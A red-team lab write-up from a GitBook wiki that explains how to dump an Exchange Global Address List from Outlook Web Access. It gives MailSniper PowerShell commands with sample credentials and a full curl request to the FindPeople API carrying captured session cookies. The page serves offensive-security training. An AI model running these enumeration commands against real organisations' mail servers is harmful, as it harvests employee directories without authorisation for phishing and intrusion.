Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Windows Event IDs and Others for Situational Awareness
Enumerating COM Objects and their Methods
Enumerating Users without net, Services without sc and Scheduled Tasks without schtasks
Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging
Dump GAL from OWA
T1010: Application Window Discovery
T1087: Account Discovery & Enumeration
Using COM to Enumerate Hostname, Username, Domain, Network Drives
Detecting Sysmon on the Victim Host
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Dump GAL from OWA

This lab uses MailSniper to dump Global Address List (GAL) off the Outlook Web Application (OWA).

GAL - in layman terms is simply an address book of all the people that are known to the Exchange mail server. You know those auto suggestions when you are typing in the email address in the TO field in your email client - they are coming from the GAL.

What Microsoft says about GAL:

Global address lists (GALs): The built-in GAL that's automatically created by Exchange includes every mail-enabled object in the Active Directory forest. You can create additional GALs to separate users by organization or location, but a user can only see and use one GAL.

​https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019​

Execution

Import the MailSniper module and dump the GAL, provided you have at least one set of working credentials:

attacker@local
. MailSniper.ps1
Get-GlobalAddressList -ExchHostname dc01.offense.local -UserName offense\spotless -Password 123456
GAL successfully dumped

When looking at the contacts through the OWA UI, as mentioned in Blackhill Security article, GetPeopleFilters API is called to retrieve the AddressListID:

It is then passed to FindPeople API:

...which in turn retrieves a JSON object with contacts from the GAL

If you are interested in the JSON only (most likely), just switch to the Response tab:

If you have logged on to the OWA UI, you could also dump the JSON via CURL in bash:

attacker@kali
curl 'https://dc01/owa/service.svc?action=FindPeople' -X POST -H 'Cookie: X-BackEndCookie=S-1-5-21-2552734371-813931464-1050690807-500=u56Lnp2ejJqBnszNmc/KnszSm5qZztLLnszH0seZy8bSnpudypzJzs3Pyc7GgYHNz87G0s/N0s7Lq87Gxc/PxczO&S-1-5-21-2552734371-813931464-1050690807-1106=u56Lnp2ejJqBnszNmc/KnszSm5qZztLLnszH0seZy8bSnpudypzJzs3Pyc7GgYHNz87G0s/O0s3Hq8/PxcvPxc/O; ClientId=TFFPI9GMPEWAPEYPZVIWXQ; PrivateComputer=true; PBack=0; cadata=ESW2hf2tJL2L7Czb69B+/VNo0l5+rM6POPTUJIv0Vj7vsXMUvbqXzNpIkl/GylwMQG4QQg9Y8PkjGlJXU94tEis0V03jSVdgBVUnhOm2cLE=; cadataTTL=lWhZTkknWXOawVEzMk2O5w==; cadataKey=J2xUs5cK+VfEie4cIY6lUI2mE/TkCnmPNm8GY8rJN4x0eZzPLJG5L6igl8y19Xy+i2nKIwKASgtsA8IhZ3uXHuPbd5QYpDZ0YB2yPwTxYCHmUcYWbwBnbt08EFJrAfUL1je4rYgk1iQ43za/S0q0j3Rk1bMqSG6Puk3h0cWkTh4sJ2TtJ/h2UypAVVcIzPZTicLTreFK9JfabW30+r4M+AeQQUGuFXof1iTsPx8TffjSXHeTa3rg+hTh8yZJKXieRfL9YSssSU1g+zRp09w2HqXvtqm0vtXrcCF7jLB3jBzSbC1KtQ+bYPoYQduxvhFS6TV2L8ky421wukMslBV9nQ==; cadataIV=LT7ecWINf5C9N2D4rIA8A1HcR936GFTNMtH3bVI/qr8UR0oi1+yhITjYBg1XIqt4W2YM+qPFXhKQrA0ExhlsObjAdd3KnExbAZwlLoz1YMLTo+tEKhpa6zSKjHvWsPwCZdRuXIOhvUeIyUA6XqpT/ALuCM+QzrY4K96CkkOhl276SAwqTO8cJ++9BdrF7Jcz2e0lWjdPyaXcCj7xCY7Ku6ci8SU2jfohVhUDJYJJo7DURhvLg8jto3r7Wihx2xk7/36V8SjFjz7PDhXiGKqHJltq9erLqXeNPmdZ1pwIxHywbwGNCYxdsnIrkrFRE9DRTiKrpGv2zLEz3LpcA/oBLA==; cadataSig=crGDgMGnHI1qkLJecj9/CHvQqjn8zYtdBTTU3HpszGTRysm+5JL80TnWuedWVPh3XQMFuyUdobef4WBJ3t1waLhBSGIPJSxis8fxCwChZ4nDgRlvnU4N8MJMwmw2l8dHCQTb950FGZYeuwiTxTwVQcHUwvtNQ6urkf4jlqro24G386GvPPXXpvjwZAfimSitjfzO4AucI1lv1Qbt6psmPnMphNDtn3n3R/eKvGPJWPT12DQOO4/qeyhv1Idtmi7QGSqASSQXNwP+Dtn0WPb2+RPtu3dhNf/KC+3babolnTavkYc/ioIVhHUA9J7mO8XX+c+0E94vBI1DYjJVOV2QUg==; ASP.NET_SessionId=0476a55e-b193-4001-ba25-214c7aa1ebc2; TimeOffset=0; Eac_CmdletLogging=false; UC=df6d6d163ec4477cb1b5ee11d6fcd5ae; AppcacheVer=15.1.225.42:en-uswrld; X-OWA-CANARY=DGcjQo94fESiIolOxDka23AinLgbe9YIJCe8-7U7KhN9-2OKKXNACOK61kwxroUcki4YMtH51O4.' -H 'Origin: https://dc01' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9' -H 'X-OWA-UrlPostData: %7B%22__type%22%3A%22FindPeopleJsonRequest%3A%23Exchange%22%2C%22Header%22%3A%7B%22__type%22%3A%22JsonRequestHeaders%3A%23Exchange%22%2C%22RequestServerVersion%22%3A%22Exchange2013%22%2C%22TimeZoneContext%22%3A%7B%22__type%22%3A%22TimeZoneContext%3A%23Exchange%22%2C%22TimeZoneDefinition%22%3A%7B%22__type%22%3A%22TimeZoneDefinitionType%3A%23Exchange%22%2C%22Id%22%3A%22GMT%20Standard%20Time%22%7D%7D%7D%2C%22Body%22%3A%7B%22__type%22%3A%22FindPeopleRequest%3A%23Exchange%22%2C%22IndexedPageItemView%22%3A%7B%22__type%22%3A%22IndexedPageView%3A%23Exchange%22%2C%22BasePoint%22%3A%22Beginning%22%2C%22Offset%22%3A0%2C%22MaxEntriesReturned%22%3A50%7D%2C%22QueryString%22%3Anull%2C%22ParentFolderId%22%3A%7B%22__type%22%3A%22TargetFolderId%3A%23Exchange%22%2C%22BaseFolderId%22%3A%7B%22__type%22%3A%22AddressListId%3A%23Exchange%22%2C%22Id%22%3A%224ee5c1bc-232a-4edb-b5e0-3596da3b7e05%22%7D%7D%2C%22PersonaShape%22%3A%7B%22__type%22%3A%22PersonaResponseShape%3A%23Exchange%22%2C%22BaseShape%22%3A%22Default%22%2C%22AdditionalProperties%22%3A%5B%7B%22__type%22%3A%22PropertyUri%3A%23Exchange%22%2C%22FieldURI%22%3A%22PersonaAttributions%22%7D%5D%7D%2C%22ShouldResolveOneOffEmailAddress%22%3Afalse%2C%22SearchPeopleSuggestionIndex%22%3Afalse%7D%7D' -H 'Action: FindPeople' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'X-OWA-CANARY: DGcjQo94fESiIolOxDka23AinLgbe9YIJCe8-7U7KhN9-2OKKXNACOK61kwxroUcki4YMtH51O4.' -H 'Content-Length: 0' -H 'X-OWA-ActionName: BrowseInDirectory' -H 'X-OWA-ActionId: -34' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36' -H 'Content-Type: application/json; charset=UTF-8' -H 'Accept: */*' -H 'X-OWA-ClientBuildVersion: 15.1.225.42' -H 'X-OWA-CorrelationId: TFFPI9GMPEWAPEYPZVIWXQ_154757883153962' -H 'X-OWA-ClientBegin: 2019-01-15T19:00:31.539' -H 'X-OWA-Attempt: 1' --compressed --insecure

References

​https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/​

​

Previous
Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging
Next
T1010: Application Window Discovery
Last updated 2 years ago
Contents
Execution
References